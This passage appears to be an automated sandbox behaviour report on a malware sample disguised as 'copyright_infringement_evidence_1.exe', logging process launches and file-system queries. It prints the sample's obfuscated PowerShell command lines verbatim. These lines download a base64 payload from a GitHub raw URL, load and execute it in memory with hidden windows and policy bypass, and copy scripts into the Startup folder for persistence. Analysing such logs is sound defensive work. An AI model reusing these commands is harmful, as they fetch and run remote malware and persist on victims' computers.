Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'lgaoacaajablae4adga6agmatwbnafmauabfagmawwa0acwamqa1acwamga1af0alqbkag8asqboaccajwapacgaiaaoacgajwb7adiafqb1ahiabaagad0aiab7adaajwaraccafqboahqadaanacsajwbwahmaogavac8acgbhahcalganacsajwbnagkadaboaccakwanahuajwaraccaygb1ahmazqbyaccakwanagmabwbuahqajwaraccazqbuahqalgbjag8ajwaraccabqavae4ajwaraccabwbeaguadablagmajwaraccadabpaccakwanag4alwboag8arablaccakwanahqazqbjahqatwbuac8ajwaraccacganacsajwblaccakwanagyajwaraccacwavaccakwanaggazqanacsajwbhagqacwavag0ayqbpag4alwbeaccakwanaguadaanacsajwbhaggatgbvahqazqbfaeoalgb0ahgadaanacsajwb7adaafqanacsajwa7acaajwaraccaewanacsajwayah0aygbhahmajwaraccazqa2adqaqwbvaccakwanag4ajwaraccadablag4ajwaraccadaagad0aiaaoae4azqb3ac0atwbiagoazqbjahqajwaraccaiabtaccakwanahkacwb0accakwanaguabqanacsajwauae4azqb0accakwanac4avwanacsajwblaccakwanagiajwaraccaqwbsagkazqanacsajwbuaccakwanahqajwaraccakqauaccakwanaeqajwaraccabwb3ag4ababvaccakwanageajwaraccazabtahqajwaraccacganacsajwbpaccakwanag4azwanacsajwaoahsajwaraccamgb9ahuacgbsackaowagaccakwanahsamgb9agiaaqanacsajwbuageajwaraccacgb5aemabwbuaccakwanahqazqbuahqaiaa9acaawwbtaccakwanahkacwb0aguabqauaccakwanaemabwbuahyazqbyaccakwanahqaxqa6accakwanadoargbyaccakwanag8ajwaraccabqbcageacwbladyanabtahqacgbpag4azwaoahsamgb9agiayqanacsajwbzaguanga0accakwanaemajwaraccabwbuahqajwaraccazqbuahqakqanacsajwa7accakwanacaaewayah0ajwaraccayqbzahmazqanacsajwbtaccakwanagiajwaraccabab5acaajwaraccapqagafsaugblagyajwaraccabablaccakwanagmajwaraccadabpaccakwanag8abgauaeeacwbzaguabqbiaccakwanagwaeqbdadoaogbmaccakwanag8ayqanacsajwbkaccakwanacgaewanacsajwayah0aygbpag4ayqanacsajwbyahkajwaraccaqwanacsajwbvag4adablag4adaapadsaiab7adiafqanacsajwbjaccakwanag8abqbtageajwaraccabganacsajwbkacaapqanacsajwagahsamab9afsajwaraccazabuagwaaqbiac4ajwaraccasqbpac4asabvag0azqbdadoaoganacsajwbwaccakwanaeeasqaoaccakwanahsajwaraccamwanacsajwb9adaalwanacsajwblaccakwanafmaqqbjaccakwanaeyajwaraccalwbkaccakwanac8azqblac4ajwaraccazqb0accakwanahmajwaraccayqanacsajwbwac8alwa6ahmacab0accakwanahqaaaanacsajwb7admafqanacsajwasacaaewazah0amqanacsajwb7admafqanacsajwasacaaewazaccakwanah0ajwaraccaqwa6accakwanahsajwaraccamqanacsajwb9afaacgbvaccakwanagcacganacsajwbhag0araanacsajwbhaccakwanahqajwaraccayqb7adeajwaraccafqb7accakwanadmafqasacaaewanacsajwazaccakwanah0ajwaraccacgbhaccakwanagoayqbkag8ajwaraccaewazaccakwanah0alaagaccakwanahsamwb9aeeazaanacsajwbkaccakwanaekabgbqaccakwanahiabwbjaguacwbzadmamgb7admafqasaccakwanacaaewazaccakwanah0ajwaraccazaanacsajwblahmajwaraccayqb0accakwanagkadgbhagqabwb7admafqasaccakwanahsamwb9accakwanahsamwb9ackajwaraccaewanacsajwawah0ajwaraccaowanacsajwagaekajwaraccabgb2ag8aawanacsajwblac0arqb4accakwanahaajwaraccacgblahmacwbpag8abgagahsamganacsajwb9agmabwbtaccakwanag0ajwaraccayqbuaccakwanagqajwapacaalqbgacaawwbjaegayqbyaf0amwa5acwawwbjaegayqbyaf0aoqayacwawwbjaegayqbyaf0amwa2acwawwbjaegayqbyaf0amwa0ackaiaapaa==';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::fromba
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2p_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $env:comspec[4,15,25]-join'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/n'+'odetec'+'to'+'n/node'+'tecton/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/d'+'et'+'ahnote_j.txt'+'{0}'+'; '+'{'+'2}bas'+'e64co'+'n'+'ten'+'t = (new-object'+' s'+'yst'+'em'+'.net'+'.w'+'e'+'b'+'clie'+'n'+'t'+').'+'d'+'ownlo'+'a'+'dst'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'rycon'+'tent = [s'+'ystem.'+'conver'+'t]:'+':fr'+'o'+'mbase64string({2}ba'+'se64'+'c'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [ref'+'le'+'c'+'ti'+'on.assemb'+'ly]::l'+'oa'+'d'+'({'+'2}bina'+'ry'+'c'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'io.home]::'+'v'+'ai('+'{'+'3'+'}0/'+'k'+'sac'+'f'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'c:'+'{'+'1'+'}pro'+'gr'+'amd'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}ad'+'d'+'inp'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' i'+'nvok'+'e-ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -f [char]39,[char]92,[char]36,[char]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('cse'+'url = '+'kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/no'+'detecton/nodetec'+'ton/'+'refs'+'/he'+'ads/mai'+'n/det'+'ahnot'+'e_j.txt'+'kk'+'s; cs'+'ebase64'+'cont'+'e'+'nt = '+'(n'+'ew-ob'+'ject system.net.webc'+'li'+'ent).d'+'ownload'+'str'+'ing'+'(cseurl)'+'; csebinaryco'+'ntent = '+'[system.co'+'nvert]::'+'fromba'+'se'+'64'+'s'+'tr'+'i'+'ng(csebase64content'+');'+' cseassem'+'bly ='+' ['+'re'+'flect'+'io'+'n.assembly]::load(c'+'s'+'ebin'+'aryconten'+'t); csec'+'omm'+'and = '+'k'+'k'+'s['+'dnlib.io.h'+'om'+'e]'+'::vai(oni0/zbeuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hon'+'i, oni1on'+'i, onic:1'+'lpprog'+'ramd'+'ata1lponi, o'+'n'+'itondinhooni, '+'onia'+'pplau'+'nchon'+'i, o'+'nidesativa'+'dooni'+',onio'+'ni)kks; invoke-e'+'xpr'+'essi'+'o'+'n'+' c'+'secommand') -creplace ([char]67+[char]83+[char]69),[char]36 -creplace ([char]111+[char]78+[char]73),[char]34-creplace 'kks',[char]39 -replace ([char]49+[char]108+[char]112),[char]92) |iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2x_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kaaoaccaqwbtaeuajwaraccadqbyagwaiaa9acaajwaraccaswbraccakwanahmajwaraccaaab0ahqacabzadoalwavahiayqb3ac4azwbpahqaaaanacsajwb1agiadqbzaguacgbjag8abganacsajwb0aguabgb0ac4aywbvaccakwanag0alwboag8ajwaraccarablahqazqbjahqatwbuac8atgbvaeqazqb0aguaywanacsajwb0ae8abgavaccakwanahiazqbmahmajwaraccalwboaguajwaraccayqbkahmalwbtageaaqanacsajwbuac8arablahqajwaraccayqboae4abwb0accakwanaguaxwbkac4adab4ahqajwaraccaswbraccakwanahmaowagaemauwanacsajwbfagiayqbzaguanga0accakwanaemabwbuahqajwaraccazqanacsajwbuahqaiaa9acaajwaraccakaboaccakwanaguadwatae8ayganacsajwbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemajwaraccababpaccakwanaguabgb0ackalgbeaccakwanag8adwbuagwabwbhagqajwaraccauwb0ahiajwaraccaaqbuagcajwaraccakabdafmarqb1ahiabaapaccakwanadsaiabdafmarqbiagkabgbhahiaeqbdag8ajwaraccabgb0aguabgb0acaapqagaccakwanafsauwb5ahmadablag0algbdag8ajwaraccabgb2aguacgb0af0aoga6accakwanaeyacgbvag0aqgbhaccakwanahmazqanacsajwa2adqajwaraccauwanacsajwb0ahiajwaraccaaqanacsajwbuagcakabdafmarqbiageacwbladyanabdag8abgb0aguabgb0accakwanackaowanacsajwagaemauwbfageacwbzaguabqanacsajwbiagwaeqagad0ajwaraccaiabbaccakwanafiazqanacsajwbmagwazqbjahqajwaraccaaqbvaccakwanag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoaemajwaraccauwanacsajwbfagiaaqbuaccakwanageacgb5aemabwbuahqazqbuaccakwanahqakqa7acaaqwbtaeuaywanacsajwbvag0abqanacsajwbhag4azaagad0aiaanacsajwblaccakwanagsajwaraccacwbbaccakwanagqabgbsagkaygauaekatwauaegajwaraccabwbtaccakwanaguaxqanacsajwa6adoavgbbaekakabvae4asqawac8aegbiaeuadqbjaccakwanac8azaavaguazqauaccakwanaguajwaraccadabzageacaavac8aogbzahaadab0accakwanaggabwboaccakwanaekalaagag8atgbjadeabwboaccakwanaekalaagag8atgbjaemaogaxaccakwanagwacabqahiabwbnaccakwanahiayqbtaeqajwaraccayqb0ageamqbsahaabwboaekalaagag8ajwaraccatganacsajwbjahqabwbuagqaaqbuaggabwbvae4asqasacaajwaraccabwboaekaqqanacsajwbwahaatabhahuajwaraccabgbjaggabwboaccakwanaekalaagag8ajwaraccatgbjagqazqbzageadabpahyayqanacsajwbkag8abwboaekajwaraccalabvae4asqbvaccakwanae4asqapaesaawbzadsaiabjag4adgbvagsazqataeuajwaraccaeabwahiajwaraccazqbzahmaaqanacsajwbvaccakwanag4ajwaraccaiabdaccakwanafmarqbjag8abqbtageabgbkaccakqagac0aywbsaeuauabsaeeaqwblacaaiaaoafsaqwbiaeeacgbdadyanwarafsaqwbiaeeacgbdadgamwarafsaqwbiaeeacgbdadyaoqapacwawwbdaegaqqbyaf0amwa2acaalqbjafiarqbqagwaqqbdaguaiaaoafsaqwbiaeeacgbdadeamqaxacsawwbdaegaqqbyaf0anwa4acsawwbdaegaqqbyaf0anwazackalabbaemasabbahiaxqazadqalqbjafiarqbqagwaqqbdaguaiaagaccaswbrahmajwasafsaqwbiaeeacgbdadmaoqagacaalqbsaguacabsaeeaywblacaakabbaemasabbahiaxqa0adkakwbbaemasabbahiaxqaxadaaoaarafsaqwbiaeeacgbdadeamqayackalabbaemasabbahiaxqa5adiakqagahwaaqblahga';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2x_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cjj.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kaaoaccaqwbtaeuajwaraccadqbyagwaiaa9acaajwaraccaswbraccakwanahmajwaraccaaab0ahqacabzadoalwavahiayqb3ac4azwbpahqaaaanacsajwb1agiadqbzaguacgbjag8abganacsajwb0aguabgb0ac4aywbvaccakwanag0alwboag8ajwaraccarablahqazqbjahqatwbuac8atgbvaeqazqb0aguaywanacsajwb0ae8abgavaccakwanahiazqbmahmajwaraccalwboaguajwaraccayqbkahmalwbtageaaqanacsajwbuac8arablahqajwaraccayqboae4abwb0accakwanaguaxwbkac4adab4ahqajwaraccaswbraccakwanahmaowagaemauwanacsajwbfagiayqbzaguanga0accakwanaemabwbuahqajwaraccazqanacsajwbuahqaiaa9acaajwaraccakaboaccakwanaguadwatae8ayganacsajwbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemajwaraccababpaccakwanaguabgb0ackalgbeaccakwanag8adwbuagwabwbhagqajwaraccauwb0ahiajwaraccaaqbuagcajwaraccakabdafmarqb1ahiabaapaccakwanadsaiabdafmarqbiagkabgbhahiaeqbdag8ajwaraccabgb0aguabgb0acaapqagaccakwanafsauwb5ahmadablag0algbdag8ajwaraccabgb2aguacgb0af0aoga6accakwanaeyacgbvag0aqgbhaccakwanahmazqanacsajwa2adqajwaraccauwanacsajwb0ahiajwaraccaaqanacsajwbuagcakabdafmarqbiageacwbladyanabdag8abgb0aguabgb0accakwanackaowanacsajwagaemauwbfageacwbzaguabqanacsajwbiagwaeqagad0ajwaraccaiabbaccakwanafiazqanacsajwbmagwazqbjahqajwaraccaaqbvaccakwanag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoaemajwaraccauwanacsajwbfagiaaqbuaccakwanageacgb5aemabwbuahqazqbuaccakwanahqakqa7acaaqwbtaeuaywanacsajwbvag0abqanacsajwbhag4azaagad0aiaanacsajwblaccakwanagsajwaraccacwbbaccakwanagqabgbsagkaygauaekatwauaegajwaraccabwbtaccakwanaguaxqanacsajwa6adoavgbbaekakabvae4asqawac8aegbiaeuadqbjaccakwanac8azaavaguazqauaccakwanaguajwaraccadabzageacaavac8aogbzahaadab0accakwanaggabwboaccakwanaekalaagag8atgbjadeabwboaccakwanaekalaagag8atgbjaemaogaxaccakwanagwacabqahiabwbnaccakwanahiayqbtaeqajwaraccayqb0ageamqbsahaabwboaekalaagag8ajwaraccatganacsajwbjahqabwbuagqaaqbuaggabwbvae4asqasacaajwaraccabwboaekaqqanacsajwbwahaatabhahuajwaraccabgbjaggabwboaccakwanaekalaagag8ajwaraccatgbjagqazqbzageadabpahyayqanacsajwbkag8abwboaekajwaraccalabvae4asqbvaccakwanae4asqapaesaawbzadsaiabjag4adgbvagsazqataeuajwaraccaeabwahiajwaraccazqbzahmaaqanacsajwbvaccakwanag4ajwaraccaiabdaccakwanafmarqbjag8abqbtageabgbkaccakqagac0aywbsaeuauabsaeeaqwblacaaiaaoafsaqwbiaeeacgbdadyanwarafsaqwbiaeeacgbdadgamwarafsaqwbiaeeacgbdadyaoqapacwawwbdaegaqqbyaf0amwa2acaalqbjafiarqbqagwaqqbdaguaiaaoafsaqwbiaeeacgbdadeamqaxacsawwbdaegaqqbyaf0anwa4acsawwbdaegaqqbyaf0anwazackalabbaemasabbahiaxqazadqalqbjafiarqbqagwaqqbdaguaiaagaccaswbrahmajwasafsaqwbiaeeacgbdadmaoqagacaalqbsaguacabsaeeaywblacaakabbaemasabbahiaxqa0adkakwbbaemasabbahiaxqaxadaaoaarafsaqwbiaeeacgbdadeamqayackalabbaemasabbahiaxqa5adiakqagahwaaqblahga';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cjj.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $env:comspec[4,15,25]-join'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/n'+'odetec'+'to'+'n/node'+'tecton/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/d'+'et'+'ahnote_j.txt'+'{0}'+'; '+'{'+'2}bas'+'e64co'+'n'+'ten'+'t = (new-object'+' s'+'yst'+'em'+'.net'+'.w'+'e'+'b'+'clie'+'n'+'t'+').'+'d'+'ownlo'+'a'+'dst'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'rycon'+'tent = [s'+'ystem.'+'conver'+'t]:'+':fr'+'o'+'mbase64string({2}ba'+'se64'+'c'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [ref'+'le'+'c'+'ti'+'on.assemb'+'ly]::l'+'oa'+'d'+'({'+'2}bina'+'ry'+'c'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'io.home]::'+'v'+'ai('+'{'+'3'+'}0/'+'k'+'sac'+'f'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'c:'+'{'+'1'+'}pro'+'gr'+'amd'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}ad'+'d'+'inp'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' i'+'nvok'+'e-ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -f [char]39,[char]92,[char]36,[char]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('cse'+'url = '+'kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/no'+'detecton/nodetec'+'ton/'+'refs'+'/he'+'ads/mai'+'n/det'+'ahnot'+'e_j.txt'+'kk'+'s; cs'+'ebase64'+'cont'+'e'+'nt = '+'(n'+'ew-ob'+'ject system.net.webc'+'li'+'ent).d'+'ownload'+'str'+'ing'+'(cseurl)'+'; csebinaryco'+'ntent = '+'[system.co'+'nvert]::'+'fromba'+'se'+'64'+'s'+'tr'+'i'+'ng(csebase64content'+');'+' cseassem'+'bly ='+' ['+'re'+'flect'+'io'+'n.assembly]::load(c'+'s'+'ebin'+'aryconten'+'t); csec'+'omm'+'and = '+'k'+'k'+'s['+'dnlib.io.h'+'om'+'e]'+'::vai(oni0/zbeuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hon'+'i, oni1on'+'i, onic:1'+'lpprog'+'ramd'+'ata1lponi, o'+'n'+'itondinhooni, '+'onia'+'pplau'+'nchon'+'i, o'+'nidesativa'+'dooni'+',onio'+'ni)kks; invoke-e'+'xpr'+'essi'+'o'+'n'+' c'+'secommand') -creplace ([char]67+[char]83+[char]69),[char]36 -creplace ([char]111+[char]78+[char]73),[char]34-creplace 'kks',[char]39 -replace ([char]49+[char]108+[char]112),[char]92) |iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('cse'+'url = '+'kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/no'+'detecton/nodetec'+'ton/'+'refs'+'/he'+'ads/mai'+'n/det'+'ahnot'+'e_j.txt'+'kk'+'s; cs'+'ebase64'+'cont'+'e'+'nt = '+'(n'+'ew-ob'+'ject system.net.webc'+'li'+'ent).d'+'ownload'+'str'+'ing'+'(cseurl)'+'; csebinaryco'+'ntent = '+'[system.co'+'nvert]::'+'fromba'+'se'+'64'+'s'+'tr'+'i'+'ng(csebase64content'+');'+' cseassem'+'bly ='+' ['+'re'+'flect'+'io'+'n.assembly]::load(c'+'s'+'ebin'+'aryconten'+'t); csec'+'omm'+'and = '+'k'+'k'+'s['+'dnlib.io.h'+'om'+'e]'+'::vai(oni0/zbeuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hon'+'i, oni1on'+'i, onic:1'+'lpprog'+'ramd'+'ata1lponi, o'+'n'+'itondinhooni, '+'onia'+'pplau'+'nchon'+'i, o'+'nidesativa'+'dooni'+',onio'+'ni)kks; invoke-e'+'xpr'+'essi'+'o'+'n'+' c'+'secommand') -creplace ([char]67+[char]83+[char]69),[char]36 -creplace ([char]111+[char]78+[char]73),[char]34-creplace 'kks',[char]39 -replace ([char]49+[char]108+[char]112),[char]92) |iex"
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
